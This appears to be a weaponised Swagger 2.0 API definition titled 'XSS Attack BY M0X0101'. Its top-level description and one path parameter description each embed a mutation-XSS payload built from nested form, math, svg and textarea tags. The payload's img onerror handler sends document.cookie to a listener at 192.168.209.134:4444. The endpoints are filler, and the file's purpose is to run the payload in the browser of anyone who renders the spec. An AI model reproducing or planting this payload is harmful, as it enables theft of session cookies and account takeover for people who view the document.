swagger: '2.0'
info:
  title: XSS Attack BY M0X0101
  description: |
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img src="http://192.168.209.134:4444/?cookie=" + encodeURIComponent(document.cookie) onerror="this.src='http://192.168.209.134:4444/?cookie=' + encodeURIComponent(document.cookie)">
</form>
  version: production
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /M0X0101:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - M0X0101_XSS_D
      operationId: findAccounts
      summary: Finds all accounts
  '/hack/hachid/{id}':
    delete:
      parameters:
        - description: |
            <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img src="http://192.168.209.134:4444/?cookie=" + encodeURIComponent(document.cookie) onerror="this.src='http://192.168.209.134:4444/?cookie=' + encodeURIComponent(document.cookie)">
</form>
          format: int64
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: No response was specified
